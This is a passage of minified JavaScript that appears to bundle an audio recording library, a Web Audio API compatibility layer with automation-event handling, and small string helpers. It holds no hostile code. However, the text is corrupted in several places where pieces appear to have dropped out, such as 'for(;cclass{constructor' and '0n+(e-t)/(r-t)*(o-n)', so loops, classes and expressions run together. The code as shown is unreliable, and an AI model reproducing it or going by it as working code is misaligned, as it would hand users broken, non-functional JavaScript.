I(t,r);return{result:n,transferables:n}},instantiate:e=>{let{encoderId:t,mimeType:r,sampleRate:n}=e;const o=_(t,r,n);return{result:o,transferables:[o]}},register:async e=>{let{port:t}=e;return{result:await w(b,t)}}})})()})();`,fr=new Blob([dr],{type:"application/javascript; charset=utf-8"}),rn=URL.createObjectURL(fr),vt=lr(rn),Ue=vt.encode,on=vt.instantiate,hr=vt.register;URL.revokeObjectURL(rn);const pr=e=>(t,n)=>{if(e===null)throw new Error("A native BlobEvent could not be created.");return new e(t,n)},mr=(e,t)=>(n,r,o)=>{const s=[];let a=r,c=0;for(;cclass{constructor(r=null){this._listeners=new WeakMap,this._nativeEventTarget=r===null?e():r}addEventListener(r,o,s){if(o!==null){let a=this._listeners.get(o);a===void 0&&(a=t(this,o),typeof o=="function"&&this._listeners.set(o,a)),this._nativeEventTarget.addEventListener(r,a,s)}}dispatchEvent(r){return this._nativeEventTarget.dispatchEvent(r)}removeEventListener(r,o,s){const a=o===null?void 0:this._listeners.get(o);this._nativeEventTarget.removeEventListener(r,a===void 0?null:a,s)}},wr=e=>()=>{if(e===null)throw new Error("A native EventTarget could not be created.");return e.document.createElement("p")},_t=(e="")=>{try{return new DOMException(e,"InvalidModificationError")}catch(t){return t.code=13,t.message=e,t.name="InvalidModificationError",t}},vr=()=>{try{return new DOMException("","InvalidStateError")}catch(e){return e.code=11,e.name="InvalidStateError",e}},_r=e=>e!==null&&e.BlobEvent!==void 0&&e.MediaStream!==void 0&&(e.MediaRecorder===void 0||e.MediaRecorder.isTypeSupported!==void 0)?new Promise(t=>{if(e.MediaRecorder===void 0)return t(!0);const n=e.document.createElement("canvas");if(n.getContext("2d"),typeof n.captureStream!="function")return t(!1);const r=n.captureStream(),o="audio/webm";try{const s=new 
e.MediaRecorder(r,{mimeType:o});s.addEventListener("dataavailable",({data:a})=>t(a.type===o)),s.start(),setTimeout(()=>s.stop(),10)}catch(s){t(s.name==="NotSupportedError")}}):Promise.resolve(!1),yr=(e,t,n,r,o,s,a)=>class extends s{constructor(i,u={}){const{mimeType:d}=u;if(a!==null&&(d===void 0||a.isTypeSupported!==void 0&&a.isTypeSupported(d))){const l=e(a,i,u);super(l),this._internalMediaRecorder=l}else if(d!==void 0&&o.some(l=>l.test(d)))super(),a!==null&&a.isTypeSupported!==void 0&&a.isTypeSupported("audio/webm;codecs=pcm")?this._internalMediaRecorder=r(this,a,i,d):this._internalMediaRecorder=n(this,i,d);else throw a!==null&&e(a,i,u),t();this._ondataavailable=null,this._onerror=null,this._onpause=null,this._onresume=null,this._onstart=null,this._onstop=null}get mimeType(){return this._internalMediaRecorder.mimeType}get ondataavailable(){return this._ondataavailable===null?this._ondataavailable:this._ondataavailable[0]}set ondataavailable(i){if(this._ondataavailable!==null&&this.removeEventListener("dataavailable",this._ondataavailable[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("dataavailable",u),this._ondataavailable=[i,u]}else this._ondataavailable=null}get onerror(){return this._onerror===null?this._onerror:this._onerror[0]}set onerror(i){if(this._onerror!==null&&this.removeEventListener("error",this._onerror[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("error",u),this._onerror=[i,u]}else this._onerror=null}get onpause(){return this._onpause===null?this._onpause:this._onpause[0]}set onpause(i){if(this._onpause!==null&&this.removeEventListener("pause",this._onpause[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("pause",u),this._onpause=[i,u]}else this._onpause=null}get onresume(){return this._onresume===null?this._onresume:this._onresume[0]}set onresume(i){if(this._onresume!==null&&this.removeEventListener("resume",this._onresume[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("resume",u),this._onresume=[i,u]}else this._onresume=null}get onstart(){return this._onstart===null?this._onstart:this._onstart[0]}set onstart(i){if(this._onstart!==null&&this.removeEventListener("start",this._onstart[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("start",u),this._onstart=[i,u]}else this._onstart=null}get onstop(){return this._onstop===null?this._onstop:this._onstop[0]}set onstop(i){if(this._onstop!==null&&this.removeEventListener("stop",this._onstop[1]),typeof i=="function"){const u=i.bind(this);this.addEventListener("stop",u),this._onstop=[i,u]}else this._onstop=null}get state(){return this._internalMediaRecorder.state}pause(){return this._internalMediaRecorder.pause()}resume(){return this._internalMediaRecorder.resume()}start(i){return this._internalMediaRecorder.start(i)}stop(){return this._internalMediaRecorder.stop()}static isTypeSupported(i){return a!==null&&a.isTypeSupported!==void 0&&a.isTypeSupported(i)||o.some(u=>u.test(i))}},Er=e=>e!==null&&e.BlobEvent!==void 0?e.BlobEvent:null,Ar=(e,t)=>(n,r,o)=>{const s=[],a=new WeakMap,c=new WeakMap,i=new n(r,o),u=new WeakMap;let d=!0;return i.addEventListener=(l=>(h,m,w)=>{let f=m;return typeof m=="function"&&(h==="dataavailable"?(f=p=>{setTimeout(()=>{if(d&&i.state==="inactive")s.push(p.data);else{if(s.length>0){const g=p.data;Object.defineProperty(p,"data",{value:new Blob([...s,g],{type:g.type})}),s.length=0}m.call(i,p)}})},a.set(m,f)):h==="error"?(f=p=>{if(p.error===void 0)m.call(i,new ErrorEvent("error",{error:e()}));else 
if(p.error.name==="UnknownError"){const g=p.error.message;m.call(i,new ErrorEvent("error",{error:e(g)}))}else p instanceof ErrorEvent?m.call(i,p):m.call(i,new ErrorEvent("error",{error:p.error}))},c.set(m,f)):h==="stop"&&(f=p=>{d=!1,setTimeout(()=>m.call(i,p))},u.set(m,f))),l.call(i,h,f,w)})(i.addEventListener),i.dispatchEvent=(l=>h=>{let m;setTimeout(()=>{m=d,d=!1});const w=l.call(i,h);return setTimeout(()=>d=m),w})(i.dispatchEvent),i.removeEventListener=(l=>(h,m,w)=>{let f=m;if(typeof m=="function"){if(h==="dataavailable"){const p=a.get(m);p!==void 0&&(f=p)}else if(h==="error"){const p=c.get(m);p!==void 0&&(f=p)}else if(h==="stop"){const p=u.get(m);p!==void 0&&(f=p)}}return l.call(i,h,f,w)})(i.removeEventListener),i.start=(l=>h=>{if(o.mimeType!==void 0&&o.mimeType.startsWith("audio/")&&r.getVideoTracks().length>0)throw t();return d=h!==void 0,h===void 0?l.call(i):l.call(i,h)})(i.start),i},br=e=>e===null||e.MediaRecorder===void 0?null:e.MediaRecorder,$e=()=>{try{return new DOMException("","NotSupportedError")}catch(e){return e.code=9,e.name="NotSupportedError",e}},Cr=e=>(t,n,r,o=2)=>{const s=e(t,n);if(s===null)return s;const{length:a,value:c}=s;if(r==="master")return{content:null,length:a};if(n+a+c>t.byteLength)return null;if(r==="binary"){const i=(c/Float32Array.BYTES_PER_ELEMENT-1)/o,u=Array.from({length:o},()=>new Float32Array(i));for(let d=0;d(t,n)=>{const r=e(t,n);if(r===null)return r;const{length:o,value:s}=r;return s===35?{length:o,type:"binary"}:s===46||s===97||s===88713574||s===106212971||s===139690087||s===172351395||s===256095861?{length:o,type:"master"}:{length:o,type:"unknown"}},Nr=e=>(t,n)=>{const r=e(t,n);if(r===null)return r;const o=n+Math.floor((r-1)/8);if(o+r>t.byteLength)return null;let a=t.getUint8(o)&(1<<8-r%8)-1;for(let c=1;c{},Bt=e=>{throw e};function Or(e){return e?e.next&&e.error&&e.complete?e:{complete:(e.complete??ke).bind(e),error:(e.error??Bt).bind(e),next:(e.next??ke).bind(e)}:{complete:ke,error:Bt,next:ke}}const Sr=e=>(t,n,r)=>e(o=>{const s=a=>o.next(a);return t.addEventListener(n,s,r),()=>t.removeEventListener(n,s,r)}),Rr=(e,t)=>{const n=()=>{},r=o=>typeof o[0]=="function";return o=>{const s=(...a)=>{const c=o(r(a)?t({next:a[0]}):t(...a));return c!==void 0?c:n};return s[Symbol.observable]=()=>({subscribe:(...a)=>({unsubscribe:s(...a)})}),e(s)}},Ir=Rr(Mr,Or),sn=Sr(Ir);/*! - * dashify - * - * Copyright (c) 2015-2017, Jon Schlinkert. - * Released under the MIT License. 
- */var kr=(e,t)=>{if(typeof e!="string")throw new TypeError("expected a string");return e.trim().replace(/([a-z])([A-Z])/g,"$1-$2").replace(/\W/g,n=>/[À-ž]/.test(n)?n:"-").replace(/^-+|-+$/g,"").replace(/-{2,}/g,n=>t&&t.condense?"-":n).toLowerCase()};const Lr=nn(kr);var an={exports:{}};(function(e){var t=function(n){var r,o,s=/\w+/.exec(n);if(s)o=s[0];else return"an";var a=o.toLowerCase(),c=["honest","hour","hono"];for(r in c)if(a.indexOf(c[r])==0)return"an";if(a.length==1)return"aedhilmnorsx".indexOf(a)>=0?"an":"a";if(o.match(/(?!FJO|[HLMNS]Y.|RY[EO]|SQU|(F[LR]?|[HL]|MN?|N|RH?|S[CHKLMNPTVW]?|X(YL)?)[AEIOU])[FHLMNRSX][A-Z]/))return"an";var i=[/^e[uw]/,/^onc?e\b/,/^uni([^nmd]|mo)/,/^u[bcfhjkqrst][aeiou]/];for(r=0;r=0?"an":"a":"aeiou".indexOf(a[0])>=0||a.match(/^y(b[lor]|cl[ea]|fere|gg|p[ios]|rou|tt)/)?"an":"a"};e.exports=t})(an);var Pr=an.exports;const xr=nn(Pr),Dt=(e,t)=>t===void 0?e:t.reduce((n,r)=>{if(r==="capitalize"){const o=n.charAt(0).toUpperCase(),s=n.slice(1);return`${o}${s}`}return r==="dashify"?Lr(n):r==="prependIndefiniteArticle"?`${xr(n)} ${n}`:n},e),Ur=e=>{const t=e.name+e.modifiers.map(n=>`\\.${n}\\(\\)`).join("");return new RegExp(`\\$\\{${t}}`,"g")},Wt=(e,t)=>{const n=/\${([^.}]+)((\.[^(]+\(\))*)}/g,r=[];let o=n.exec(e);for(;o!==null;){const a={modifiers:[],name:o[1]};if(o[3]!==void 0){const c=/\.[^(]+\(\)/g;let i=c.exec(o[2]);for(;i!==null;)a.modifiers.push(i[0].slice(1,-2)),i=c.exec(o[2])}r.push(a),o=n.exec(e)}const s=r.reduce((a,c)=>a.map(i=>typeof i=="string"?i.split(Ur(c)).reduce((u,d,l)=>l===0?[d]:c.name in t?[...u,Dt(t[c.name],c.modifiers),d]:[...u,h=>Dt(h[c.name],c.modifiers),d],[]):[i]).reduce((i,u)=>[...i,...u],[]),[e]);return a=>s.reduce((c,i)=>typeof i=="string"?[...c,i]:[...c,i(a)],[]).join("")},Ge=(e,t={})=>{const n=e.code===void 0?void 0:Wt(e.code,t),r=e.message===void 0?void 0:Wt(e.message,t);function o(s={},a){const c=a===void 0&&(s instanceof Error||s.code!==void 0&&s.code.slice(-9)==="Exception"),{cause:i,missingParameters:u}=c?{cause:s,missingParameters:{}}:{cause:a,missingParameters:s},d=r===void 0?new Error:new Error(r(u));return i!==null&&(d.cause=i),n!==void 0&&(d.code=n(u)),e.status!==void 0&&(d.status=e.status),d}return o},ze={INTERNAL_ERROR:-32603,INVALID_PARAMS:-32602,METHOD_NOT_FOUND:-32601};Ge({message:'The requested method called "${method}" is not supported.',status:ze.METHOD_NOT_FOUND});Ge({message:'The handler of the method called "${method}" returned no required result.',status:ze.INTERNAL_ERROR});Ge({message:'The handler of the method called "${method}" returned an unexpected result.',status:ze.INTERNAL_ERROR});Ge({message:'The specified parameter called "portId" with the given value "${portId}" does not identify a port connected to this worker.',status:ze.INVALID_PARAMS});const Br=(e,t,n)=>async r=>{const o=new e([n],{type:"application/javascript; charset=utf-8"}),s=t.createObjectURL(o);try{await r(s)}finally{t.revokeObjectURL(s)}},Dr=e=>({data:t})=>{const{id:n}=t;if(n!==null){const r=e.get(n);if(r!==void 0){const{reject:o,resolve:s}=r;e.delete(n),t.error===void 0?s(t.result):o(new Error(t.error.message))}}},Wr=e=>(t,n)=>(r,o=[])=>new Promise((s,a)=>{const c=e(t);t.set(c,{reject:a,resolve:s}),n.postMessage({id:c,...r},o)}),Vr=(e,t,n,r)=>(o,s,a={})=>{const c=new o(s,"recorder-audio-worklet-processor",{...a,channelCountMode:"explicit",numberOfInputs:1,numberOfOutputs:0}),i=new Map,u=t(i,c.port),d=n(c.port,"message")(e(i));c.port.start();let l="inactive";return Object.defineProperties(c,{pause:{get(){return 
async()=>(r(["recording"],l),l="paused",u({method:"pause"}))}},port:{get(){throw new Error("The port of a RecorderAudioWorkletNode can't be accessed.")}},record:{get(){return async h=>(r(["inactive"],l),l="recording",u({method:"record",params:{encoderPort:h}},[h]))}},resume:{get(){return async()=>(r(["paused"],l),l="recording",u({method:"resume"}))}},stop:{get(){return async()=>{r(["paused","recording"],l),l="stopped";try{await u({method:"stop"})}finally{d()}}}}}),c},Fr=(e,t)=>{if(!e.includes(t))throw new Error(`Expected the state to be ${e.map(n=>`"${n}"`).join(" or ")} but it was "${t}".`)},jr='(()=>{"use strict";class e extends AudioWorkletProcessor{constructor(){super(),this._encoderPort=null,this._state="inactive",this.port.onmessage=e=>{let{data:t}=e;"pause"===t.method?"active"===this._state||"recording"===this._state?(this._state="paused",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"record"===t.method?"inactive"===this._state?(this._encoderPort=t.params.encoderPort,this._state="active",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"resume"===t.method?"paused"===this._state?(this._state="active",this._sendAcknowledgement(t.id)):this._sendUnexpectedStateError(t.id):"stop"===t.method?"active"!==this._state&&"paused"!==this._state&&"recording"!==this._state||null===this._encoderPort?this._sendUnexpectedStateError(t.id):(this._stop(this._encoderPort),this._sendAcknowledgement(t.id)):"number"==typeof t.id&&this.port.postMessage({error:{code:-32601,message:"The requested method is not supported."},id:t.id})}}process(e){let[t]=e;if("inactive"===this._state||"paused"===this._state)return!0;if("active"===this._state){if(void 0===t)throw new Error("No channelData was received for the first input.");if(0===t.length)return!0;this._state="recording"}if("recording"===this._state&&null!==this._encoderPort){if(void 0===t)throw new Error("No channelData was received for the first input.");if(0!==t.length)return this._encoderPort.postMessage(t,t.map((e=>{let{buffer:t}=e;return t}))),!0;this._stop(this._encoderPort)}return!1}_sendAcknowledgement(e){this.port.postMessage({id:e,result:null})}_sendUnexpectedStateError(e){this.port.postMessage({error:{code:-32603,message:"The internal state does not allow to process the given message."},id:e})}_stop(e){e.postMessage([]),e.close(),this._encoderPort=null,this._state="stopped"}}e.parameterDescriptors=[],registerProcessor("recorder-audio-worklet-processor",e)})();',$r=Br(Blob,URL,jr),Gr=Vr(Dr,Wr(cr),sn,Fr),Vt=(e,t,n)=>({endTime:t,insertTime:n,type:"exponentialRampToValue",value:e}),Ft=(e,t,n)=>({endTime:t,insertTime:n,type:"linearRampToValue",value:e}),at=(e,t)=>({startTime:t,type:"setValue",value:e}),cn=(e,t,n)=>({duration:n,startTime:t,type:"setValueCurve",values:e}),un=(e,t,{startTime:n,target:r,timeConstant:o})=>r+(t-r)*Math.exp((n-e)/o),ge=e=>e.type==="exponentialRampToValue",Be=e=>e.type==="linearRampToValue",oe=e=>ge(e)||Be(e),yt=e=>e.type==="setValue",te=e=>e.type==="setValueCurve",De=(e,t,n,r)=>{const o=e[t];return o===void 0?r:oe(o)||yt(o)?o.value:te(o)?o.values[o.values.length-1]:un(n,De(e,t-1,o.startTime,r),o)},jt=(e,t,n,r,o)=>n===void 
0?[r.insertTime,o]:oe(n)?[n.endTime,n.value]:yt(n)?[n.startTime,n.value]:te(n)?[n.startTime+n.duration,n.values[n.values.length-1]]:[n.startTime,De(e,t-1,n.startTime,o)],it=e=>e.type==="cancelAndHold",ct=e=>e.type==="cancelScheduledValues",re=e=>it(e)||ct(e)?e.cancelTime:ge(e)||Be(e)?e.endTime:e.startTime,$t=(e,t,n,{endTime:r,value:o})=>n===o?o:0n+(e-t)/(r-t)*(o-n),zr=(e,t)=>{const n=Math.floor(t),r=Math.ceil(t);return n===r?e[n]:(1-(t-n))*e[n]+(1-(r-t))*e[r]},qr=(e,{duration:t,startTime:n,values:r})=>{const o=(e-n)/t*(r.length-1);return zr(r,o)},Le=e=>e.type==="setTarget";class Hr{constructor(t){this._automationEvents=[],this._currenTime=0,this._defaultValue=t}[Symbol.iterator](){return this._automationEvents[Symbol.iterator]()}add(t){const n=re(t);if(it(t)||ct(t)){const r=this._automationEvents.findIndex(s=>ct(t)&&te(s)?s.startTime+s.duration>=n:re(s)>=n),o=this._automationEvents[r];if(r!==-1&&(this._automationEvents=this._automationEvents.slice(0,r)),it(t)){const s=this._automationEvents[this._automationEvents.length-1];if(o!==void 0&&oe(o)){if(Le(s))throw new Error("The internal list is malformed.");const a=te(s)?s.startTime+s.duration:re(s),c=te(s)?s.values[s.values.length-1]:s.value,i=ge(o)?$t(n,a,c,o):Gt(n,a,c,o),u=ge(o)?Vt(i,n,this._currenTime):Ft(i,n,this._currenTime);this._automationEvents.push(u)}s!==void 0&&Le(s)&&this._automationEvents.push(at(this.getValue(n),n)),s!==void 0&&te(s)&&s.startTime+s.duration>n&&(this._automationEvents[this._automationEvents.length-1]=cn(new Float32Array([6,7]),s.startTime,n-s.startTime))}}else{const r=this._automationEvents.findIndex(a=>re(a)>n),o=r===-1?this._automationEvents[this._automationEvents.length-1]:this._automationEvents[r-1];if(o!==void 0&&te(o)&&re(o)+o.duration>n)return!1;const s=ge(t)?Vt(t.value,t.endTime,this._currenTime):Be(t)?Ft(t.value,n,this._currenTime):t;if(r===-1)this._automationEvents.push(s);else{if(te(t)&&n+t.duration>re(this._automationEvents[r]))return!1;this._automationEvents.splice(r,0,s)}}return!0}flush(t){const n=this._automationEvents.findIndex(r=>re(r)>t);if(n>1){const r=this._automationEvents.slice(n-1),o=r[0];Le(o)&&r.unshift(at(De(this._automationEvents,n-2,o.startTime,this._defaultValue),o.startTime)),this._automationEvents=r}}getValue(t){if(this._automationEvents.length===0)return this._defaultValue;const n=this._automationEvents.findIndex(a=>re(a)>t),r=this._automationEvents[n],o=(n===-1?this._automationEvents.length:n)-1,s=this._automationEvents[o];if(s!==void 0&&Le(s)&&(r===void 0||!oe(r)||r.insertTime>t))return un(t,De(this._automationEvents,o-1,s.startTime,this._defaultValue),s);if(s!==void 0&&yt(s)&&(r===void 0||!oe(r)))return s.value;if(s!==void 0&&te(s)&&(r===void 0||!oe(r)||s.startTime+s.duration>t))return t({cancelTime:e,type:"cancelAndHold"}),Xr=e=>({cancelTime:e,type:"cancelScheduledValues"}),Zr=(e,t)=>({endTime:t,type:"exponentialRampToValue",value:e}),Kr=(e,t)=>({endTime:t,type:"linearRampToValue",value:e}),Jr=(e,t,n)=>({startTime:t,target:e,timeConstant:n,type:"setTarget"}),Qr=()=>new DOMException("","AbortError"),eo=e=>(t,n,[r,o,s],a)=>{e(t[o],[n,r,s],c=>c[0]===n&&c[1]===r,a)},to=e=>(t,n,r)=>{const o=[];for(let s=0;s(t,n)=>{e.set(t,{activeInputs:new Set,passiveInputs:new WeakMap,renderer:n})},we=new WeakSet,ln=new WeakMap,dn=new WeakMap,fn=new WeakMap,hn=new WeakMap,pn=new WeakMap,mn=new WeakMap,ut=new WeakMap,lt=new WeakMap,dt=new WeakMap,gn={construct(){return gn}},ro=e=>{try{const t=new Proxy(e,gn);new 
t}catch{return!1}return!0},zt=/^import(?:(?:[\s]+[\w]+|(?:[\s]+[\w]+[\s]*,)?[\s]*\{[\s]*[\w]+(?:[\s]+as[\s]+[\w]+)?(?:[\s]*,[\s]*[\w]+(?:[\s]+as[\s]+[\w]+)?)*[\s]*}|(?:[\s]+[\w]+[\s]*,)?[\s]*\*[\s]+as[\s]+[\w]+)[\s]+from)?(?:[\s]*)("([^"\\]|\\.)+"|'([^'\\]|\\.)+')(?:[\s]*);?/,qt=(e,t)=>{const n=[];let r=e.replace(/^[\s]+/,""),o=r.match(zt);for(;o!==null;){const s=o[1].slice(1,-1),a=o[0].replace(/([\s]+)?;?$/,"").replace(s,new URL(s,t).toString());n.push(a),r=r.slice(o[0].length).replace(/^[\s]+/,""),o=r.match(zt)}return[n.join(";"),r]},Ht=e=>{if(e!==void 0&&!Array.isArray(e))throw new TypeError("The parameterDescriptors property of given value for processorCtor is not an array.")},Yt=e=>{if(!ro(e))throw new TypeError("The given value for processorCtor should be a constructor.");if(e.prototype===null||typeof e.prototype!="object")throw new TypeError("The given value for processorCtor should have a prototype.")},oo=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>{let m=0;return(w,f,p={credentials:"omit"})=>{const g=d.get(w);if(g!==void 0&&g.has(f))return Promise.resolve();const v=u.get(w);if(v!==void 0){const _=v.get(f);if(_!==void 0)return _}const A=s(w),T=A.audioWorklet===void 0?o(f).then(([_,E])=>{const[y,C]=qt(_,E),M=`${y};((a,b)=>{(a[b]=a[b]||[]).push((AudioWorkletProcessor,global,registerProcessor,sampleRate,self,window)=>{${C} -})})(window,'_AWGS')`;return n(M)}).then(()=>{const _=h._AWGS.pop();if(_===void 0)throw new SyntaxError;r(A.currentTime,A.sampleRate,()=>_(class{},void 0,(E,y)=>{if(E.trim()==="")throw t();const C=lt.get(A);if(C!==void 0){if(C.has(E))throw t();Yt(y),Ht(y.parameterDescriptors),C.set(E,y)}else Yt(y),Ht(y.parameterDescriptors),lt.set(A,new Map([[E,y]]))},A.sampleRate,void 0,void 0))}):Promise.all([o(f),Promise.resolve(e(l,l))]).then(([[_,E],y])=>{const C=m+1;m=C;const[M,I]=qt(_,E),B=`${M};((AudioWorkletProcessor,registerProcessor)=>{${I} -})(${y?"AudioWorkletProcessor":"class extends AudioWorkletProcessor {__b=new WeakSet();constructor(){super();(p=>p.postMessage=(q=>(m,t)=>q.call(p,m,t?t.filter(u=>!this.__b.has(u)):t))(p.postMessage))(this.port)}}"},(n,p)=>registerProcessor(n,class extends p{${y?"":"__c = (a) => a.forEach(e=>this.__b.add(e.buffer));"}process(i,o,p){${y?"":"i.forEach(this.__c);o.forEach(this.__c);this.__c(Object.values(p));"}return super.process(i.map(j=>j.some(k=>k.length===0)?[]:j),o,p)}}));registerProcessor('__sac${C}',class extends AudioWorkletProcessor{process(){return !1}})`,U=new Blob([B],{type:"application/javascript; charset=utf-8"}),R=URL.createObjectURL(U);return A.audioWorklet.addModule(R,p).then(()=>{if(c(A))return A;const x=a(A);return x.audioWorklet.addModule(R,p).then(()=>x)}).then(x=>{if(i===null)throw new SyntaxError;try{new i(x,`__sac${C}`)}catch{throw new SyntaxError}}).finally(()=>URL.revokeObjectURL(R))});return v===void 0?u.set(w,new Map([[f,T]])):v.set(f,T),T.then(()=>{const _=d.get(w);_===void 0?d.set(w,new Set([f])):_.add(f)}).finally(()=>{const _=u.get(w);_!==void 0&&_.delete(f)}),T}},K=(e,t)=>{const n=e.get(t);if(n===void 0)throw new Error("A value with the given key could not be found.");return n},qe=(e,t)=>{const n=Array.from(e).filter(t);if(n.length>1)throw Error("More than one element was found.");if(n.length===0)throw Error("No element was found.");const[r]=n;return e.delete(r),r},wn=(e,t,n,r)=>{const o=K(e,t),s=qe(o,a=>a[0]===n&&a[1]===r);return o.size===0&&e.delete(t),s},be=e=>K(mn,e),ye=e=>{if(we.has(e))throw new Error("The AudioNode is already stored.");we.add(e),be(e).forEach(t=>t(!0))},vn=e=>"port"in 
e,He=e=>{if(!we.has(e))throw new Error("The AudioNode is not stored.");we.delete(e),be(e).forEach(t=>t(!1))},ft=(e,t)=>{!vn(e)&&t.every(n=>n.size===0)&&He(e)},so=(e,t,n,r,o,s,a,c,i,u,d,l,h)=>{const m=new WeakMap;return(w,f,p,g,v)=>{const{activeInputs:A,passiveInputs:T}=s(f),{outputs:_}=s(w),E=c(w),y=C=>{const M=i(f),I=i(w);if(C){const N=wn(T,w,p,g);e(A,w,N,!1),!v&&!l(w)&&n(I,M,p,g),h(f)&&ye(f)}else{const N=r(A,w,p,g);t(T,g,N,!1),!v&&!l(w)&&o(I,M,p,g);const P=a(f);if(P===0)d(f)&&ft(f,A);else{const k=m.get(f);k!==void 0&&clearTimeout(k),m.set(f,setTimeout(()=>{d(f)&&ft(f,A)},P*1e3))}}};return u(_,[f,p,g],C=>C[0]===f&&C[1]===p&&C[2]===g,!0)?(E.add(y),d(w)?e(A,w,[p,g,y],!0):t(T,g,[w,p,y],!0),!0):!1}},ao=e=>(t,n,[r,o,s],a)=>{const c=t.get(r);c===void 0?t.set(r,new Set([[o,n,s]])):e(c,[o,n,s],i=>i[0]===o&&i[1]===n,a)},io=e=>(t,n)=>{const r=e(t,{channelCount:1,channelCountMode:"explicit",channelInterpretation:"discrete",gain:0});n.connect(r).connect(t.destination);const o=()=>{n.removeEventListener("ended",o),n.disconnect(r),r.disconnect()};n.addEventListener("ended",o)},co=e=>(t,n)=>{e(t).add(n)},Et=(e,t)=>e.context===t,ht=e=>{try{e.copyToChannel(new Float32Array(1),0,-1)}catch{return!1}return!0},ie=()=>new DOMException("","IndexSizeError"),_n=e=>{e.getChannelData=(t=>n=>{try{return t.call(e,n)}catch(r){throw r.code===12?ie():r}})(e.getChannelData)},uo={numberOfChannels:1},lo=(e,t,n,r,o,s,a,c)=>{let i=null;return class yn{constructor(d){if(o===null)throw new Error("Missing the native OfflineAudioContext constructor.");const{length:l,numberOfChannels:h,sampleRate:m}={...uo,...d};i===null&&(i=new o(1,1,44100));const w=r!==null&&t(s,s)?new r({length:l,numberOfChannels:h,sampleRate:m}):i.createBuffer(h,l,m);if(w.numberOfChannels===0)throw n();return typeof w.copyFromChannel!="function"?(a(w),_n(w)):t(ht,()=>ht(w))||c(w),e.add(w),w}static[Symbol.hasInstance](d){return d!==null&&typeof d=="object"&&Object.getPrototypeOf(d)===yn.prototype||e.has(d)}}},Ce=-34028234663852886e22,Ye=-Ce,se=e=>we.has(e),fo={buffer:null,channelCount:2,channelCountMode:"max",channelInterpretation:"speakers",loop:!1,loopEnd:0,loopStart:0,playbackRate:1},ho=(e,t,n,r,o,s,a,c)=>class extends e{constructor(u,d){const l=s(u),h={...fo,...d},m=o(l,h),w=a(l),f=w?t():null;super(u,!1,m,f),this._audioBufferSourceNodeRenderer=f,this._isBufferNullified=!1,this._isBufferSet=h.buffer!==null,this._nativeAudioBufferSourceNode=m,this._onended=null,this._playbackRate=n(this,w,m.playbackRate,Ye,Ce)}get buffer(){return this._isBufferNullified?null:this._nativeAudioBufferSourceNode.buffer}set buffer(u){if(this._nativeAudioBufferSourceNode.buffer=u,u!==null){if(this._isBufferSet)throw r();this._isBufferSet=!0}}get loop(){return this._nativeAudioBufferSourceNode.loop}set loop(u){this._nativeAudioBufferSourceNode.loop=u}get loopEnd(){return this._nativeAudioBufferSourceNode.loopEnd}set loopEnd(u){this._nativeAudioBufferSourceNode.loopEnd=u}get loopStart(){return this._nativeAudioBufferSourceNode.loopStart}set loopStart(u){this._nativeAudioBufferSourceNode.loopStart=u}get onended(){return this._onended}set onended(u){const d=typeof u=="function"?c(this,u):null;this._nativeAudioBufferSourceNode.onended=d;const l=this._nativeAudioBufferSourceNode.onended;this._onended=l!==null&&l===d?u:l}get playbackRate(){return this._playbackRate}start(u=0,d=0,l){if(this._nativeAudioBufferSourceNode.start(u,d,l),this._audioBufferSourceNodeRenderer!==null&&(this._audioBufferSourceNodeRenderer.start=l===void 0?[u,d]:[u,d,l]),this.context.state!=="closed"){ye(this);const 
h=()=>{this._nativeAudioBufferSourceNode.removeEventListener("ended",h),se(this)&&He(this)};this._nativeAudioBufferSourceNode.addEventListener("ended",h)}}stop(u=0){this._nativeAudioBufferSourceNode.stop(u),this._audioBufferSourceNodeRenderer!==null&&(this._audioBufferSourceNodeRenderer.stop=u)}},po=(e,t,n,r,o)=>()=>{const s=new WeakMap;let a=null,c=null;const i=async(u,d)=>{let l=n(u);const h=Et(l,d);if(!h){const m={buffer:l.buffer,channelCount:l.channelCount,channelCountMode:l.channelCountMode,channelInterpretation:l.channelInterpretation,loop:l.loop,loopEnd:l.loopEnd,loopStart:l.loopStart,playbackRate:l.playbackRate.value};l=t(d,m),a!==null&&l.start(...a),c!==null&&l.stop(c)}return s.set(d,l),h?await e(d,u.playbackRate,l.playbackRate):await r(d,u.playbackRate,l.playbackRate),await o(u,d,l),l};return{set start(u){a=u},set stop(u){c=u},render(u,d){const l=s.get(d);return l!==void 0?Promise.resolve(l):i(u,d)}}},mo=e=>"playbackRate"in e,go=e=>"frequency"in e&&"gain"in e,wo=e=>"offset"in e,vo=e=>!("frequency"in e)&&"gain"in e,_o=e=>"detune"in e&&"frequency"in e,yo=e=>"pan"in e,q=e=>K(ln,e),Te=e=>K(fn,e),pt=(e,t)=>{const{activeInputs:n}=q(e);n.forEach(o=>o.forEach(([s])=>{t.includes(e)||pt(s,[...t,e])}));const r=mo(e)?[e.playbackRate]:vn(e)?Array.from(e.parameters.values()):go(e)?[e.Q,e.detune,e.frequency,e.gain]:wo(e)?[e.offset]:vo(e)?[e.gain]:_o(e)?[e.detune,e.frequency]:yo(e)?[e.pan]:[];for(const o of r){const s=Te(o);s!==void 0&&s.activeInputs.forEach(([a])=>pt(a,t))}se(e)&&He(e)},Eo=e=>{pt(e.destination,[])},Ao=e=>e===void 0||typeof e=="number"||typeof e=="string"&&(e==="balanced"||e==="interactive"||e==="playback"),bo=(e,t,n,r,o,s,a,c)=>class extends e{constructor(u,d){const l=s(u),h=a(l),m=o(l,d,h),w=h?t(c):null;super(u,!1,m,w),this._isNodeOfNativeOfflineAudioContext=h,this._nativeAudioDestinationNode=m}get channelCount(){return this._nativeAudioDestinationNode.channelCount}set channelCount(u){if(this._isNodeOfNativeOfflineAudioContext)throw r();if(u>this._nativeAudioDestinationNode.maxChannelCount)throw n();this._nativeAudioDestinationNode.channelCount=u}get channelCountMode(){return this._nativeAudioDestinationNode.channelCountMode}set channelCountMode(u){if(this._isNodeOfNativeOfflineAudioContext)throw r();this._nativeAudioDestinationNode.channelCountMode=u}get maxChannelCount(){return this._nativeAudioDestinationNode.maxChannelCount}},Co=e=>{const t=new WeakMap,n=async(r,o)=>{const s=o.destination;return t.set(o,s),await e(r,o,s),s};return{render(r,o){const s=t.get(o);return s!==void 